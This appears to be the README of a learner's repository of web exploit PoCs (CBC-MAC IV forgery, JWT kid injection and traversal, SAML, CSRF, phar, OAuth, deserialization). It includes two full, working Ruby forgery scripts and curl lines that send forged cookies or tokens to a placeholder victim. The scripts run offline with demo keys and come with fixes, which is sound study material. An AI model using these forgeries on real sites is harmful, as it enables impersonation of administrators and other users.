Just posting some of the scripts I write as I strengthen my Pythonic coding, some exploit scripts as I work through their write-ups and attempt to develop my own PoCs, as well as random scripts from one-off challenges or snippets undeserving of an entire GitHub shrine dedicated to their rancid memory.
Thanks for reading and checking out my repo!
Based on a CBC-MAC implementation that hands the IV to the client instead of fixing it (CBC-MAC should use an IV of all null bytes that the client never sees). The PoC relies on the fact that if you can modify the IV, you can change the first block of the cookie without invalidating the signature: the block cipher's first input is IV XOR P1, so sending new_iv = iv XOR P1 XOR P1' leaves that input, and therefore every later block and the MAC, unchanged. In a basic misconfiguration like this you just need to log in; the app gives you the signature and the IV as cookies. Then XOR the IV with the first block of your current cookie, XOR the result with the first block of your desired username (this PoC uses administrator), and send that as the new IV alongside the original signature. Hopefully this simplifies something. Special thanks to Louis Nyffenegger for this one.
puts "curl -H 'Cookie: iv=#{new_iv}; auth=#{new_auth}' <victim site>"
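A worked version of that IV forgery, as an added example and not the repo's own script. It assumes AES-128 CBC-MAC with PKCS#7 padding over the username, cookies named iv and auth as in the curl line above, and a constructed key (KEY) that exists only so the script can check its own forgery offline; the function names (cbc_mac, forge_iv, forge_admin_cookie) are this example's, not the target's.

```ruby
require 'openssl'

BLOCK = 16
# Constructed demo key and zero IV; on the real target the key stays server-side
# and only the IV plus the MAC come back to the client in cookies.
KEY = ['00112233445566778899aabbccddeeff'].pack('H*')
ZERO_IV = "\x00".b * BLOCK

# PKCS#7 padding done by hand so the forgery can work on the padded blocks.
def pad(msg)
  n = BLOCK - (msg.bytesize % BLOCK)
  msg.b + (n.chr * n)
end

def xor(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# CBC-MAC = last ciphertext block of CBC encryption under `iv`.
# A correct CBC-MAC always uses ZERO_IV; the vulnerable app encrypts under
# whatever IV it gets back from the cookie.
def cbc_mac(key, iv, msg)
  c = OpenSSL::Cipher.new('AES-128-CBC')
  c.encrypt
  c.key = key
  c.iv = iv
  c.padding = 0
  ct = c.update(pad(msg)) + c.final
  ct[-BLOCK, BLOCK]
end

# AES sees IV XOR P1 as its first input. Choosing
#   new_iv = iv XOR P1 XOR P1'
# keeps that input identical, so the chain and the MAC are unchanged, provided
# every block after the first is the same in both messages.
def forge_iv(iv, old_msg, new_msg)
  old_p, new_p = pad(old_msg), pad(new_msg)
  unless old_p[BLOCK..-1] == new_p[BLOCK..-1]
    raise ArgumentError, 'only the first block may differ'
  end
  xor(xor(iv, old_p[0, BLOCK]), new_p[0, BLOCK])
end

# Attacker flow: register a 13-byte throwaway name so its padded block lines up
# with "administrator", take iv and auth from the cookies, then swap the IV.
def forge_admin_cookie(iv, auth, registered_name, target = 'administrator')
  new_iv = forge_iv(iv, registered_name, target)
  {
    cookie: target,
    iv: new_iv,
    auth: auth,
    curl: "curl -H 'Cookie: iv=#{new_iv.unpack1('H*')}; auth=#{auth.unpack1('H*')}' <victim site>"
  }
end

if __FILE__ == $PROGRAM_NAME
  iv = "\x42".b * BLOCK                       # constructed: what the app "gave" us
  auth = cbc_mac(KEY, iv, 'a' * 13)           # constructed: the server's MAC for our login
  result = forge_admin_cookie(iv, auth, 'a' * 13)
  puts result[:curl]
  puts "forgery verifies: #{cbc_mac(KEY, result[:iv], 'administrator') == auth}"
end
```

The last line of the script is the check a practitioner wants before firing the request: the server's own MAC routine, fed the new IV and the new username, must reproduce the original auth value. With a fixed zero IV (ZERO_IV, ignoring anything the client sends) the two usernames MAC to different values and the trick has nothing to work with.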
Exploit to conjure up cookies to impersonate any user; discovered by ooooooo_q @ HackerOne: https://hackerone.com/reports/473888
Inspired by the Ruby Net::FTP command injection (CVE-2017-17405); lets an attacker run commands via the JWT kid parameter.
PoC script for a common misconfiguration of JSON Web Tokens.
Another JWT PoC based on a similar misconfiguration of the kid parameter, this time due to a lack of escaping: the value is used unchecked to locate the signing key, which can allow SQLi or LFI depending on where it ends up.
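The LFI side of that, as an added example rather than the repo's script: a verifier that builds the key path straight from kid, beside a hardened one that allowlists kid and refuses anything that is not a regular file directly inside the key directory. The filesystem layout (a private keys/ directory and a world-readable public/robots.txt), the key material and the function names are all constructed for the demo; the same missing validation is what lets kid land in a SQL query when the key lookup is a database query instead of a file read.

```ruby
require 'openssl'
require 'json'
require 'tmpdir'

def b64url(bytes)
  [bytes].pack('m0').tr('+/', '-_').delete('=')
end

def b64url_decode(str)
  s = str.tr('-_', '+/')
  (s + '=' * ((4 - s.length % 4) % 4)).unpack1('m0')
end

# Constant-time comparison so the PoC's own verifier is not a timing oracle.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Mint an HS256 token. `kid` is copied into the header verbatim, exactly as a
# hand-built attacker token would carry it.
def hs256_sign(key, kid, claims)
  header = { 'alg' => 'HS256', 'typ' => 'JWT', 'kid' => kid }
  signing_input = "#{b64url(JSON.generate(header))}.#{b64url(JSON.generate(claims))}"
  "#{signing_input}.#{b64url(OpenSSL::HMAC.digest('SHA256', key, signing_input))}"
end

def check_sig(h, c, s, key)
  expected = OpenSSL::HMAC.digest('SHA256', key, "#{h}.#{c}")
  secure_equal?(expected, b64url_decode(s)) ? JSON.parse(b64url_decode(c)) : nil
end

# Vulnerable verifier: kid goes straight into a file path, so "../" walks out
# of key_dir and any readable file with known contents becomes the HMAC key.
def verify_vulnerable(token, key_dir)
  h, c, s = token.split('.')
  kid = JSON.parse(b64url_decode(h))['kid']
  check_sig(h, c, s, File.read(File.join(key_dir, kid)))
end

# Hardened verifier: kid must match an allowlist pattern and name a regular
# file directly inside key_dir; no part of the path is attacker-shaped.
KID_PATTERN = /\A[a-z0-9_-]{1,32}\z/

def verify_hardened(token, key_dir)
  h, c, s = token.split('.')
  kid = JSON.parse(b64url_decode(h))['kid'].to_s
  return nil unless kid.match?(KID_PATTERN)
  path = File.join(key_dir, kid)
  return nil unless File.file?(path)
  check_sig(h, c, s, File.read(path))
end

# Constructed filesystem: a private key dir plus a public dir holding a file
# whose contents the attacker can fetch over HTTP (the traversal target).
def run_demo
  Dir.mktmpdir do |root|
    key_dir = File.join(root, 'keys')
    Dir.mkdir(key_dir)
    File.write(File.join(key_dir, 'prod-1'), 'server-only-secret')
    Dir.mkdir(File.join(root, 'public'))
    File.write(File.join(root, 'public', 'robots.txt'), "User-agent: *\n")

    forged = hs256_sign("User-agent: *\n", '../public/robots.txt', { 'user' => 'administrator' })
    legit  = hs256_sign('server-only-secret', 'prod-1', { 'user' => 'bob' })
    {
      forged_vs_vulnerable: verify_vulnerable(forged, key_dir), # => {"user"=>"administrator"}
      forged_vs_hardened:   verify_hardened(forged, key_dir),   # => nil
      legit_vs_hardened:    verify_hardened(legit, key_dir)     # => {"user"=>"bob"}
    }
  end
end

puts run_demo.inspect if __FILE__ == $PROGRAM_NAME
```

The forged token is signed with the bytes of robots.txt and points kid at that file by relative path; the vulnerable verifier reads it as the key and accepts the administrator claim, while the hardened one drops the token at the allowlist check before any file is touched.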
Very basic implementation to easily produce that big chunky SAML payload you can swap in with a web proxy right before it hits the server.
Converts a list of space-separated ASCII codes into UTF-8, for baby's first crypto challenge.
Like the above: baby's first hex decoder, for human babies.
Super primitive CSRF PoC, though aimed at an endpoint that takes a JSON body.
python3 methodist.py [full url]
Tamper with some parameters to expose a weakness in your web app's OAuth implementation. Fill in the variables noted within, then try the resulting token against the resource server with:
curl -H 'Authorization: Bearer [TOKEN]' [RESOURCE_SERVER]/api/keys --dump-header -
PoC for a very poor phar implementation. Hopefully this is near extinct in the wild and lives on solely through some honeypots.
Again, a very simple SAML PoC; the code really couldn't be boiled down much further.
Couldn't get the other scripts on here to work for me, nor the articles I read, for the case I was attempting to exploit. Extremely impressive and clever work from Luke Jahnke in this article: https://www.elttam.com/blog/ruby-deserialization/
Another script from the infant's crypto challenge building-blocks primer.
This really doesn't come standard as a bash command, and I'm not looking it up on Google for the fourth time this season.